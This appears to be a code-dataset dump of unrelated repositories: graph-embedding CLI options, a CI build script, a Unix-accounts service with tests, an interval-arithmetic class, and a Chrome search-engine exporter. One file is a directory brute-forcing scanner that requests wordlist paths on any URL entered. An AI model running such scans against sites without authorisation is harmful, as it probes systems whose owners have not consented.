default = 128,
help = 'Number of dimensions. Default is 128.')
parser.add_argument('--down-sampling',
type = float,
default = 0.001,
help = 'Down sampling frequency. Default is 0.001.')
parser.add_argument('--alpha',
type = float,
default = 0.025,
help = 'Initial learning rate. Default is 0.025.')
parser.add_argument('--min-alpha',
type = float,
default = 0.025,
help = 'Final learning rate. Default is 0.025.')
parser.add_argument('--min-count',
type = int,
default = 1,
help = 'Minimal feature count. Default is 1.')
parser.add_argument('--workers',
type = int,
default = 4,
help = 'Number of cores. Default is 4.')
parser.add_argument('--epochs',
type = int,
default = 10,
help = 'Number of epochs. Default is 10.')
parser.add_argument('--features',
nargs = '?',
default = 'wl',
help = 'Feature extraction mechanism. Default is wl.')
parser.add_argument('--labeling-iterations',
type = int,
default = 2,
help = 'Number of WL labeling iterations. Default is 2.')
parser.add_argument('--log-base',
type = int,
default = 1.5,
help = 'Log base for label creation. Default is 1.5.')
parser.add_argument('--graphlet-size',
type = int,
default = 4,
help = 'Maximal graphlet size. Default is 4.')
parser.add_argument('--quantiles',
type = int,
default = 5,
help = 'Number of quantiles for binning. Default is 5.')
parser.add_argument('--motif-compression',
nargs = '?',
default = 'string',
help = 'Motif compression procedure -- string or factorization.')
parser.add_argument('--seed',
type = int,
default = 42,
help = 'Sklearn random seed. Default is 42.')
parser.add_argument('--factors',
type = int,
default = 8,
help = 'Number of factors for motif compression. Default is 8.')
parser.add_argument('--clusters',
type = int,
default = 50,
help = 'Number of motif based labels. Default is 50.')
parser.add_argument('--beta',
type = float,
default = 0.01,
help = 'Motif compression factorization regularizer. Default is 0.01.')
return parser.parse_args()
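# Illustrative usage (hedged): a driver script in this repo would typically do
#   args = parameter_parser()
#   print(args.dimensions, args.walk_length)  # -> 128 80 unless overridden on the CLI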
``` |
{
"source": "1nf1n1ty08/funwithserverless",
"score": 2
} |
#### File: _CI/library/template_library.py
```python
class Environment():
def __init__(self, full_name, short_name, branch_name):
self._full_name = full_name
self._short_name = short_name
self._branch_name = branch_name
@property
def full_name(self):
return self._full_name
@property
def short_name(self):
return self._short_name
@property
def branch_name(self):
return self._branch_name
def __eq__(self, other):
return self.full_name == other.full_name
def __hash__(self):
return hash(self.full_name)
class Test(Environment):
def __init__(self):
super().__init__('test', 't', 'test')
class Acceptance(Environment):
def __init__(self):
super().__init__('acceptance', 'a', 'acceptance')
class Services(Environment):
def __init__(self):
super().__init__('services', 's', 'services')
class Production(Environment):
def __init__(self):
super().__init__('production', 'p', 'master')
def get_possible_environments():
return [Test(), Acceptance(), Services(), Production()]
def get_environment(git):
current_branch = git.get_current_branch()
environment = Test()
for env in get_possible_environments():
if env.branch_name == current_branch:
environment = env
return environment
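# Illustrative sketch (hedged; the `git` argument only needs a get_current_branch() method):
#   class _FakeGit:
#       def get_current_branch(self):
#           return "acceptance"
#   assert get_environment(_FakeGit()) == Acceptance()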
```
#### File: _CI/scripts/build.py
```python
import logging
import os
import shutil
import time
# this sets up everything and MUST be included before any third party module in every step
import _initialize_template
from emoji import emojize
from bootstrap import bootstrap
from configuration import BUILD_REQUIRED_FILES, LOGGING_LEVEL, PROJECT_SLUG, PROJECT_PREFIX
from library import (clean_up,
execute_command,
save_requirements,
get_venv_parent_path,
get_environment)
# This is the main prefix used for logging
LOGGER_BASENAME = '''_CI.build'''
LOGGER = logging.getLogger(LOGGER_BASENAME)
LOGGER.addHandler(logging.NullHandler())
def build():
bootstrap()
# clean_up(('build', 'dist'))
success = execute_command('pipenv lock')
if success:
LOGGER.info('Successfully created lock file %s %s',
emojize(':white_heavy_check_mark:'),
emojize(':thumbs_up:'))
else:
LOGGER.error('%s Errors creating lock file! %s',
emojize(':cross_mark:'),
emojize(':crying_face:'))
raise SystemExit(1)
save_requirements(get_venv_parent_path(), [], True)
[save_requirements('./src/containers/' + folder, [], False) for folder in os.listdir('./src/containers/')
if os.path.isdir('./src/containers/' + folder) and '__pycache__' not in folder]
environment = get_environment()
ref_name = os.environ.get('CI_COMMIT_REF_NAME')
if ref_name:
ref_name = ref_name.replace("/", "-")
ecr_repo = os.environ.get('ECR_REPOSITORY')
if not ecr_repo:
ecr_repo = PROJECT_PREFIX
version = os.environ.get('CI_COMMIT_TAG')
base_name = ecr_repo + '/' + PROJECT_PREFIX + environment + '-' + PROJECT_SLUG + '-' + ref_name
for folder in os.listdir('./src/containers/'):
if os.path.isdir('./src/containers/' + folder) and '__pycache__' not in folder:
docker_build = 'docker build -t ' + base_name + '-' + folder + ':latest'
if version:
docker_build += ' -t ' + base_name + '-' + folder + ':' + version
docker_build += ' ./src/containers/' + folder
success = execute_command(docker_build)
if not success:
break
[save_requirements('./src/functions/' + folder, ['boto3'], False) for folder in os.listdir('./src/functions/')
if os.path.isdir('./src/functions/' + folder) and '__pycache__' not in folder]
if success:
success = execute_command('sam build --template template.yml')
# success = execute_command('python setup.py sdist bdist_egg')
if success:
LOGGER.info('%s Successfully built artifact %s',
emojize(':white_heavy_check_mark:'),
emojize(':thumbs_up:'))
else:
LOGGER.error('%s Errors building artifact! %s',
emojize(':cross_mark:'),
emojize(':crying_face:'))
return True if success else False
if __name__ == '__main__':
raise SystemExit(0 if build() else 1)
``` |
{
"source": "1nFecT3D/searchEngines",
"score": 3
} |
#### File: 1nFecT3D/searchEngines/searchMe.py
```python
import os.path
import sqlite3
import re
import json
import click
def data_handler(data):
return_data = json.dumps(data, sort_keys=True, indent=4,
separators=(',', ': '))
print(return_data)
@click.command()
@click.option(
'--path',
default='~/Library/Application Support/Google/Chrome/Default/Web Data',
help="Path to Chrome's 'Web Data' Folder")
@click.option(
'--outfile',
default='se_from_chrome.json',
help="Output file")
def export(path, outfile):
path = os.path.expanduser(path)
conn = sqlite3.connect(path)
with conn:
try:
keywords = conn.execute('''select * from keywords''')
except sqlite3.OperationalError:
data_handler([{"success":False,"error":{"code":"010","message":"Is Chrome running? Must be closed to work."}}])
raise
search_engines = [{'name': kw[1], 'keyword': kw[2], 'url': kw[4]}
for kw in keywords if re.search(r'{searchTerms}', kw[4])]
output = json.dumps(search_engines, sort_keys=True, indent=4,
separators=(',', ': '))
with open(outfile, 'w') as w:
w.write(json.dumps([{'success':True,'payload':output,'error':'null'}], sort_keys=True, indent=4,
separators=(',', ': ')))
data_handler([{'success':True,'payload':output,'error':'null'}])
if __name__ == "__main__":
export()
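# Illustrative CLI usage (hedged; Chrome must be closed so its 'Web Data' SQLite file is unlocked):
#   python searchMe.py --outfile se_from_chrome.json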
``` |
{
"source": "1nfiniteloop/unix-accounts",
"score": 3
} |
#### File: unix_accounts/bin/auth_tokens.py
```python
import secrets
from typing import FrozenSet
class AuthorizationTokens:
def __init__(self, filename: str):
self._filename = filename
def get_tokens(self) -> FrozenSet[str]:
return self._read_tokens()
def generate_token(self) -> str:
token = secrets.token_urlsafe(32)
self._write_token(token)
return token
def _write_token(self, token: str):
with open(self._filename, "at") as file:
file.write(token)
file.write("\n")
def _read_tokens(self) -> FrozenSet[str]:
with open(self._filename, "r") as file:
return frozenset(self._token_gen(file))
def _token_gen(self, file):
lines = file.read()
for line in lines.split("\n"):
if (line):
yield line
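# Illustrative usage (hedged; the file path below is an assumption, any writable path works):
#   tokens = AuthorizationTokens("/var/lib/unix-accounts/tokens")
#   new_token = tokens.generate_token()
#   assert new_token in tokens.get_tokens()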
```
#### File: unix_accounts/commandline/command_password.py
```python
import argparse
from getpass import getpass
from storage import UnixPasswordStorage
from .command import Command
class CommandPassword(Command):
def __init__(self, parser: argparse.ArgumentParser, password_storage: UnixPasswordStorage):
self._register_commands(parser)
self._parser = parser
self._password_storage = password_storage
@staticmethod
def _register_commands(parser: argparse.ArgumentParser):
parser.add_argument("name", type=str, nargs=1, help="User name")
def exec(self, args: argparse.Namespace):
cmd = CommandExec(args, self._password_storage)
cmd.exec()
class CommandExec:
def __init__(self, args: argparse.Namespace, password_storage: UnixPasswordStorage):
self._args = args
self._password_storage = password_storage
def exec(self):
new_password = getpass(prompt="New password: ")
self._password_storage.update(self._args.name[0], new_password)
```
#### File: unix_accounts/format/groups_asciitable.py
```python
from typing import (
Tuple,
)
from terminaltables import AsciiTable
from group import UnixGroup
def fmt_members(members: Tuple[str]):
return ",".join(members)
def fmt_groups(groups: Tuple[UnixGroup]):
return list([grp.name, grp.id, fmt_members(grp.members)] for grp in groups)
class GroupsAsciiTable:
def __init__(self, groups: Tuple[UnixGroup]):
self._groups = fmt_groups(groups)
def __str__(self):
HEADER = ("Group name", "Id", "User membership")
data = [HEADER]
data.extend(self._groups)
ascii_table = AsciiTable(data)
return ascii_table.table
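# Illustrative usage (hedged; UnixGroup construction mirrors the tests elsewhere in this repo):
#   table = GroupsAsciiTable((UnixGroup(name="dev", id_=1000, members=("alice", "bob")),))
#   print(table)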
```
#### File: unix_accounts/format/groups_json.py
```python
from typing import (
Dict
)
from group import UnixGroup
class JsonAttributeGroup:
name = "gr_name"
password = "<PASSWORD>"
gid = "gr_gid"
members = "gr_mem"
def _fmt_groups(unix_group: UnixGroup) -> Dict:
return {
JsonAttributeGroup.name: unix_group.name,
JsonAttributeGroup.password: "x",
JsonAttributeGroup.gid: unix_group.id,
JsonAttributeGroup.members: unix_group.members
}
class JsonFormatterGroup(dict):
def __init__(self, unix_group: UnixGroup):
super().__init__(_fmt_groups(unix_group))
```
#### File: unix_accounts/http_request/group_test.py
```python
from tornado.testing import AsyncHTTPTestCase
import tornado.web
import tornado.httputil
import tornado.escape
from unittest.mock import Mock
from error import DoesNotExist
from format import JsonAttributeGroup
from group import UnixGroup
from .group import (
HttpRequestGroup,
Parameter,
)
from storage import UnixGroupStorage
class Defaults:
unix_group = UnixGroup(
name="groupname",
id_=10000,
members=("first-user", "second-user")
)
class Mocks:
def __init__(self):
self.storage = Mock(spec=UnixGroupStorage)
class GroupsTest(AsyncHTTPTestCase):
API_ENDPOINT = "/api/groups"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._mocks = Mocks()
def setUp(self):
super().setUp()
self._mocks.storage.reset_mock()
def get_app(self):
return tornado.web.Application(
handlers=[
(self.API_ENDPOINT, HttpRequestGroup, dict(group_storage=self._mocks.storage)),
])
def test_get_all_groups(self):
self._mocks.storage.get_all.return_value = [
Defaults.unix_group,
Defaults.unix_group
]
response = self.fetch(self.API_ENDPOINT, method="GET")
decoded_response = tornado.escape.json_decode(response.body)
self.assertEqual(200, response.code)
self.assertIn("all", decoded_response)
self.assertEqual(len(decoded_response["all"]), 2, "Expects to return two groups")
def test_get_all_groups_when_non_existing(self):
self._mocks.storage.get_all.return_value = []
response = self.fetch(self.API_ENDPOINT, method="GET")
decoded_response = tornado.escape.json_decode(response.body)
self.assertEqual(200, response.code)
self.assertIn("all", decoded_response)
self.assertEqual(len(decoded_response["all"]), 0, "Expects to return empty list")
def test_get_group_by_invalid_id(self):
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
Parameter.USER_ID: "nan"
})
response = self.fetch(url, method="GET")
self.assertEqual(400, response.code)
def test_invalid_argument(self):
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
"invalid-attribute": "nan"
})
response = self.fetch(url, method="GET")
self.assertEqual(400, response.code)
def test_get_group_by_id(self):
self._mocks.storage.get_by_id.return_value = Defaults.unix_group
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
Parameter.USER_ID: "10000"
})
response = self.fetch(url, method="GET")
decoded_response = tornado.escape.json_decode(response.body)
self.assertEqual(200, response.code)
self._assert_attributes(decoded_response)
def test_get_group_by_name(self):
self._mocks.storage.get_by_name.return_value = Defaults.unix_group
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
Parameter.USER_NAME: "user"
})
response = self.fetch(url, method="GET")
decoded_response = tornado.escape.json_decode(response.body)
self.assertEqual(200, response.code)
self._assert_attributes(decoded_response)
def _assert_attributes(self, decoded_response):
self.assertEqual(Defaults.unix_group.id, decoded_response[JsonAttributeGroup.gid])
self.assertEqual(Defaults.unix_group.name, decoded_response[JsonAttributeGroup.name])
self.assertEqual(Defaults.unix_group.id, decoded_response[JsonAttributeGroup.gid])
self.assertSetEqual(set(Defaults.unix_group.members), set(decoded_response[JsonAttributeGroup.members]))
def test_get_non_existing_group_by_name(self):
self._mocks.storage.get_by_name = Mock(side_effect=DoesNotExist())
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
Parameter.USER_NAME: "user"
})
response = self.fetch(url, method="GET")
self.assertEqual(404, response.code)
def test_get_non_existing_group_by_gid(self):
self._mocks.storage.get_by_id = Mock(side_effect=DoesNotExist())
url = tornado.httputil.url_concat(self.API_ENDPOINT, {
Parameter.USER_ID: "10000"
})
response = self.fetch(url, method="GET")
self.assertEqual(404, response.code)
```
#### File: unix_accounts/storage_sqlite/group_member_api.py
```python
import sqlalchemy.exc
from error import (
AlreadyExist,
DoesNotExist
)
from group import UnixGroup
from storage import UnixGroupMemberStorage
from .group_schema import Group
from .group_fmt import fmt_group
from .user_schema import User
from .sqlite_api import (
Database,
DatabaseApi
)
class UnixGroupMemberStorageSqlite(UnixGroupMemberStorage):
def __init__(self, db: Database):
self._db = DatabaseApi(db)
def add_member(self, user: str, group: str) -> UnixGroup:
group = self._try_add_member(*self._try_load_member(user, group))
return fmt_group(group)
def _try_add_member(self, user: User, group: Group) -> Group:
if user in group.user_membership:
raise AlreadyExist("User {user} is already member of {grp}".format(user=user.name, grp=group.name))
else:
group.user_membership.append(user)
self._db.update()
return group
def _try_load_member(self, user: str, group: str):
try:
group = self._db.get_one(Group, filters=(Group.name == group,))
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("Group {grp} does not exist".format(grp=group))
try:
user = self._db.get_one(User, filters=(User.name == user,))
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {user} does not exist".format(user=user))
return user, group
def delete_member(self, user: str, group: str) -> UnixGroup:
group = self._try_delete_member(*self._try_load_member(user, group))
return fmt_group(group)
def _try_delete_member(self, user: User, group: Group) -> Group:
if user in group.user_membership:
group.user_membership.remove(user)
self._db.update()
else:
raise DoesNotExist("User {user} is not a member of {grp}".format(user=user.name, grp=group.name))
return group
```
#### File: unix_accounts/storage_sqlite/sqlite_api.py
```python
import sqlalchemy.exc
import sqlalchemy.event
from sqlalchemy.orm.query import Query
from sqlalchemy.orm.session import Session
from sqlalchemy.orm import (
joinedload
)
from .db import Database
from .schema import SchemaBase
class DatabaseApi:
def __init__(self, database: Database):
self._database = database
@property
def _session(self) -> Session:
return self._database.session
def _query(self, cls, filters=(), preload=()) -> Query:
query = self._session.query(cls).options(joinedload(rel) for rel in preload)
if filters:
query = query.filter(*filters)
return query
def _commit(self):
try:
self._session.commit()
except sqlalchemy.exc.DatabaseError:
self._session.rollback()
raise
def get(self, cls, filters: tuple=(), preload: tuple=()) -> list:
return self._query(cls, filters, preload).all()
def get_one(self, cls, filters: tuple=(), preload: tuple=()):
return self._query(cls, filters, preload).one()
def add(self, item: SchemaBase):
self._session.add(item)
self._commit()
def add_all(self, items: list):
self._session.add_all(items)
self._commit()
# bulk updates: https://docs.sqlalchemy.org/en/latest/orm/query.html?highlight=update#sqlalchemy.orm.query.Query.update
# items_updated = self._query.filter(selector.filter).update(...)
def update(self):
self._commit()
def delete(self, cls, filters: tuple=()) -> bool:
rows = self._query(cls, filters).delete()
self._commit()
return rows > 0
def exists(self, cls, filters: tuple=()) -> bool:
rows = self._query(cls, filters).count()
return rows > 0
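# Illustrative usage sketch (hedged; `Database` and the mapped `User` schema come from this
# package, and the exact constructor fields used below are an assumption):
#   api = DatabaseApi(db)
#   if not api.exists(User, filters=(User.name == "alice",)):
#       api.add(User(name="alice"))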
```
#### File: unix_accounts/storage_sqlite/user_api.py
```python
from typing import List, Tuple
import sqlalchemy.exc
from sqlalchemy.sql.expression import func
from error import (
DoesNotExist,
AlreadyExist,
)
from storage import UnixUserStorage
from user import UnixUser
from .group_fmt import fmt_group
from .group_schema import (
Group,
GroupId
)
from .password_schema import Password
from .user_schema import (
User,
UserId
)
from .sqlite_api import (
Database,
DatabaseApi
)
def _fmt_group_members(groups: Tuple[User]) -> Tuple[str]:
return tuple(group.name for group in groups)
def _fmt_user(user: User) -> UnixUser:
return UnixUser(
name=user.name,
uid=user.id,
group=fmt_group(user.group),
gecos=user.gecos,
home_dir=user.home_dir,
shell=user.shell,
group_membership=_fmt_group_members(user.group_membership)
)
class UnixUserStorageSqlite(UnixUserStorage):
def __init__(self, db: Database):
self._db = DatabaseApi(db)
@staticmethod
def _default_home(user_name: str) -> str:
return "/home/" + user_name
def add(self, name: str, uid: int = None, gid: int = None, gecos: str = None, home_dir: str = None, shell: str = None) -> UnixUser:
user = User()
user.name = name
user.user_id = UserId(id=uid)
user.shell = shell
user.gecos = gecos
if home_dir:
user.home_dir = home_dir
else:
user.home_dir = self._default_home(name)
if gid:
            if self._db.exists(Group, filters=(Group.id == gid,)):
user.gid = gid
else:
raise DoesNotExist("Group id {gid} does not exist".format(gid=gid))
else:
user.group = self._try_add_group(name, uid)
user.password = Password()
user.password.name = name
try:
self._db.add(user)
except sqlalchemy.exc.IntegrityError:
if uid:
msg = "User: \"{name}\" or uid: {uid} is not unique".format(name=name, uid=user.id)
else:
msg = "User: \"{name}\" is not unique".format(name=name)
raise AlreadyExist(msg)
return _fmt_user(user)
def _try_add_group(self, name: str, gid: int) -> Group:
# Try to favor uid == gid
group = Group()
group.name = name
if not self._db.exists(Group, filters=(Group.id == gid,)):
group.group_id = GroupId(id=gid)
else:
group.group_id = GroupId()
return group
def update_id(self, name: str, new_id: int) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,), preload=(User.user_id,))
user.user_id.id = new_id
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User id {name} does not exist".format(name=name))
except sqlalchemy.exc.IntegrityError:
raise AlreadyExist("User with id {uid} already exist".format(uid=new_id))
def update_gid(self, name: str, new_gid: int) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
user.gid = new_gid
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
except sqlalchemy.exc.IntegrityError:
raise DoesNotExist("Group id {gid} does not exist".format(gid=new_gid))
def update_name(self, name: str, new_name: str) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
user.name = new_name
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
except sqlalchemy.exc.IntegrityError:
raise AlreadyExist("User {name} already exist".format(name=new_name))
def update_gecos(self, name: str, new_gecos: str) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
user.gecos = new_gecos
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
def update_home_dir(self, name: str, new_home_dir: str) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
user.home_dir = new_home_dir
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
def update_shell(self, name: str, new_shell: str) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
user.shell = new_shell
self._db.update()
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
def delete(self, name: str) -> bool:
try:
user = self._db.get_one(User, filters=(User.name == name,))
return self._db.delete(UserId, filters=(UserId.id == user.id,))
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User {name} does not exist".format(name=name))
def get_by_id(self, uid: int) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.id == uid,))
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User with uid: {uid} does not exist".format(uid=uid))
def get_by_name(self, name: str) -> UnixUser:
try:
user = self._db.get_one(User, filters=(User.name == name,))
return _fmt_user(user)
except sqlalchemy.exc.NoResultFound:
raise DoesNotExist("User: {name} does not exist".format(name=name))
def get_all(self) -> List[UnixUser]:
users = self._db.get(User)
return [_fmt_user(user) for user in users]
```
#### File: src/unix_accounts/user.py
```python
from typing import Tuple
from group import UnixGroup
class UnixUser:
def __init__(self, name: str, uid: int = None, group: UnixGroup = None, gecos = None, home_dir: str = None, shell: str = None, group_membership: Tuple[str] = ()):
self._name = name
self._uid = uid
self._group = group
self._gecos = gecos
self._home_dir = home_dir
self._shell = shell
self._group_membership = group_membership
@property
def name(self) -> str:
return self._name
@property
def uid(self) -> int:
return self._uid
@property
def group(self) -> UnixGroup:
return self._group
@property
def gecos(self) -> str:
return self._gecos
@property
def home_dir(self) -> str:
return self._home_dir
@property
def shell(self) -> str:
return self._shell
@property
def group_membership(self) -> Tuple[str]:
return self._group_membership
``` |
{
"source": "1nhee/ACFWebApp",
"score": 3
} |
#### File: ACFWebApp/module/dbModule.py
```python
import pymysql
class Database():
def __init__(self):
self.db = pymysql.connect(host='acfwebapp.mysql.database.azure.com',
user='acfwebapp@acfwebapp',
db='userdb', password='<PASSWORD>', charset='utf8')
        try:
            with self.db.cursor() as cursor:
                sql = """
                CREATE TABLE test_table(
                idx INT UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
                name VARCHAR(256) NOT NULL,
                nick VARCHAR(256) NOT NULL
                );
                """
                cursor.execute(sql)
                self.db.commit()
        finally:
            self.db.close()
``` |
{
"source": "1nn0/misc_utilities",
"score": 3
} |
#### File: misc_utilities/utilities/text.py
```python
import os
import re
def get_files(path, ext=None):
"""
Get all files in directory path, optionally with the specified extension
"""
if ext is None:
ext = ''
return [
        os.path.abspath(os.path.join(path, fname))
        for fname in os.listdir(path)
        if os.path.isfile(os.path.join(path, fname))
if fname.endswith(ext)
]
def blob_text(filenames):
"""Create a blob of text by reading in all filenames into a string"""
return '\n'.join([open(filename).read() for filename in filenames])
def get_definition(text, startswith):
"""Parse text to retrieve the definitions that start with keyword"""
return [
re.split('[ ()]', line.strip())[1]
for line in [line.strip() for line in text.splitlines()]
if line.startswith(startswith)
]
def get_functions(text, startswith='def '):
"""Parse text to retrive the functions and methods defined"""
return get_definition(text, startswith)
def get_classes(text, startswith='class '):
"""Parse text to retrive the functions and methods defined"""
return get_definition(text, startswith)
def find_options(filename):
"""
Grab all of the ini style options in a specified file (ignoring sections)
"""
with open(filename) as fp:
text = [
line for line in fp.readlines()
if not line.startswith('#')
if '=' in line
]
return sorted(list(set(opt.split()[0] for opt in text)))
def find_functions(text):
"""Find all function names defined on all lines of the given text"""
return list(set([
re.split('[ (]*', line)[1]
for line in [
line.strip()
for line in text.splitlines()
if 'def ' in line
]
if line.startswith('def ')
]))
def find_missing_keywords(keywords, text):
"""
Return the subset of keywords which are missing from the given text
"""
found = set()
for key in keywords:
if key in text:
found.add(key)
return list(set(keywords) - found)
def glob_filepath(path, ext=None):
"""
Return all of the absolute filepaths in a given directory
Optionally, return only those that end with ``ext``
"""
if ext is None:
ext = ''
return [
os.path.abspath(os.path.join(path, f))
for f in os.listdir(path)
if f.endswith(ext)
]
def find_missing_functions(keywords, text):
"""
%timeit find_missing_funcs(funcs, text)
1 loops, best of 3: 973 ms per loop
"""
found = set()
for line in text.splitlines():
if not line.strip().startswith('def '):
for f in keywords:
if f in line:
found.add(f)
return list(set(keywords) - found)
def find_used_modules(modules, text):
"""
Given a list of modules, return the set of all those imported in text
"""
used = set()
for line in text.splitlines():
for mod in modules:
if 'import' in line and mod in line:
used.add(mod)
return used
def reverse_readline(filename, buf_size=8192):
"""a generator that returns the lines of a file in reverse order
Taken from srohde on Stack Overflow:
http://stackoverflow.com/a/23646049/450858
"""
with open(filename) as fh:
segment = None
offset = 0
fh.seek(0, os.SEEK_END)
total_size = remaining_size = fh.tell()
while remaining_size > 0:
offset = min(total_size, offset + buf_size)
fh.seek(-offset, os.SEEK_END)
buffer = fh.read(min(remaining_size, buf_size))
remaining_size -= buf_size
lines = buffer.split('\n')
# the first line of the buffer is probably not a complete line so
# we'll save it and append it to the last line of the next buffer
# we read
if segment is not None:
# if the previous chunk starts right from the beginning of line
# do not concact the segment to the last line of new chunk
# instead, yield the segment first
                if buffer[-1] != '\n':
lines[-1] += segment
else:
yield segment
segment = lines[0]
for index in range(len(lines) - 1, 0, -1):
yield lines[index]
yield segment
def grep(lines, pattern=None):
if pattern is None:
pattern = r''
regex = re.compile(pattern)
for line in lines:
if regex.search(line):
yield line
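# Illustrative usage of the two generators above (hedged; "app.log" is a placeholder path):
#   for line in grep(reverse_readline("app.log"), pattern=r"ERROR"):
#       print(line)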
``` |
{
"source": "1nnr3d/simple-dir-buster",
"score": 2
} |
#### File: 1nnr3d/simple-dir-buster/main.py
```python
import requests
import urllib
from time import sleep
from threading import Thread
from colorama import Fore
def startDir():
print(Fore.BLUE + """
MMMMMMMMMMMMWNK0kxdoolllccclllodxk0KNWMMMMMMMMMMMM
MMMMMMMMMWX0xdllccclccccclllcccccllldx0XWMMMMMMMMM
MMMMMMWN0xollccccclllcccclllcccccccclclox0NWMMMMMM
MMMMMN0dlccccccccccccccccccccccccclcclcccld0NWMMMM
MMMWKxlcccccclodxkOOOOkxoollclccccccccccccclxKWMMM
MMNOoccccccldOXNNXKKKXXNXXKkolcccccccccclcccloONMM
MNklcccccld0NNK0KK0kxxxk0KXNXkolcccccccccccccclkNM
NklcccccldKWX0KXK0OxxxxxxxxONNOoccccccccccccccclkN
0oclcccco0WKOKXOxxxxxxxxxxxxONNklccccccccccccccco0
xlccccccdXN0kOOxxxxxxxxxxxxxkKW0occccccccccccccclx
occcccccdXW0xxxxxxxxxxxxxxxxkKW0occcccccccccccccco
llccccclo0WXkxxxxxxxxxxxxxxx0NNxlccccccccccccccccl
lcclccccld0NXOxxxxxxxxxxxxk0NNOlcccccccccccccccccl
llcclcccclokXNX0OkxxxkkOKXNWMNOdlcclllccccccccccll
occcccccclclok0XNXXXXXNXKK00XNXKdccclllcccccccccco
klccccccccclcclodxkkkxxdlllldOkl,.';cccclccccccclk
Xdlcccccccccccccccccccccllccllc'....';cccccccccldX
WKdlllccccccccccccccccccccclcccc;'....';cclcclldKW
MWKdlcccccccccccccccccccclccclcccc;'....,clccldKWM
MMWXklcccccclcccccccccccccccccccclcc;'';cccclkXWMM
MMMMN0dlcccccclccccccccccccccccccllcccccccld0NMMMM
MMMMMWN0xlclcccccccccccccccccccccclccclclx0NWMMMMM
MMMMMMMWNKkdllcccccccccccccccccccccllldkKNMMMMMMMM
MMMMMMMMMMWNKOkdollcccclcccccccllodkOKNWMMMMMMMMMM
MMMMMMMMMMMMMMWNKOxdolllcccllodxOKNWMMMMMMMMMMMMMM
\t\t\t\t\t github/1nnr3d
""")
urL = input("URL: ")
if "http://" in urL:
pass
elif "https://" in urL:
pass
elif len(urL) < 1:
raise Exception("Link Wrong or Missing!")
else:
urL = "http://" + urL
filePath = input("File Path: ")
if len(filePath) < 1:
raise Exception("File Path Wrong or Missing!")
print("-"*50)
Thread(target=fileRead, args=(urL,filePath)).start()
def fileRead(url,fp):
with open(fp, "r") as f:
words = f.readlines()
Thread(target=dir, args=(url,words)).start()
def dir(url,wrds):
if url[-1] != "/":
for w in wrds:
w = str(w).replace('\n','')
u = f"{url}/{w}"
r = requests.get(u, proxies=urllib.request.getproxies())
r = str(r).replace('<', '').replace('>', '').replace('Response ', '')
if "200" in r:
print(f"{u} : {r} + FOUND!")
else:
print(f"{u} : {r} ? ")
else:
for w in wrds:
w = str(w).replace('\n', '')
u = url + w
r = requests.get(u, proxies=urllib.request.getproxies())
r = str(r).replace('<','').replace('>','').replace('Response ', '')
if "200" in r:
print(f"{u} : {r} + FOUND!")
else:
print(f"{u} : {r} ? ")
sleep(2)
startDir()
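# Illustrative run (hedged): the script prompts for a target URL and a wordlist file, then
# requests each candidate path and flags HTTP 200 responses as found, e.g.
#   URL: example.com
#   File Path: common.txt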
``` |
{
"source": "1nolySk/Interval-Arithmetic",
"score": 3
} |
#### File: 1nolySk/Interval-Arithmetic/InterArith.py
```python
class Ia():
def __init__(self, a,b):
self.x = float(min(a,b))
self.y = float(max(a,b))
def __add__(self, ob):
if isinstance(ob, Ia):
return Ia(self.x+ob.x , self.y+ob.y)
return Ia(self.x+ob , self.y+ob)
def __sub__(self, ob):
if isinstance(ob, Ia):
return Ia(self.x-ob.y , self.y-ob.x)
return Ia(self.x-ob , self.y-ob)
def __rsub__(self, ob):
if isinstance(ob, Ia):
return Ia(ob.y - self.x, ob.x-self.y)
return Ia(ob-self.x , ob-self.y)
def __mul__(self, ob):
if isinstance(ob, Ia):
t= [self.x*ob.x,
self.y*ob.y,
self.x*ob.y,
self.y*ob.x]
return Ia(min(t), max(t))
t = [self.x*ob, self.y*ob]
return Ia(min(t), max(t))
def __truediv__(self, ob):
if isinstance(ob, Ia):
t= [self.x*(1/ob.x),
self.y*(1/ob.y),
self.x*(1/ob.y),
self.y*(1/ob.x)]
return Ia(min(t), max(t))
t= [self.x/ob , self.y/ob]
return Ia(min(t), max(t))
def __rtruediv__(self, ob):
if isinstance(ob, Ia):
t= [ob.x*(1/self.x),
ob.y*(1/self.y),
ob.x*(1/self.y),
ob.y*(1/self.x),]
return Ia(min(t), max(t))
t= [ob/self.x , ob/self.y]
return Ia(min(t), max(t))
def __eq__(self, ob):
if isinstance(ob, Ia):
if self.x == ob.x and self.y==ob.y:
return True
else:
if self.x == ob or self.y==ob:
return True
return False
def __str__(self):
return (f"[{self.x}, {self.y}]")
``` |
{
"source": "1nonlyabhi/icp-forum",
"score": 2
} |
#### File: icp-forum/blog/views.py
```python
from django.shortcuts import render, get_object_or_404, redirect
from blog.models import Post, Comment
from users.models import Follow
from notifications.models import Notification
from .forms import NewCommentForm
from django.views import View
from django.contrib import messages
from django.contrib.auth.models import User, Group
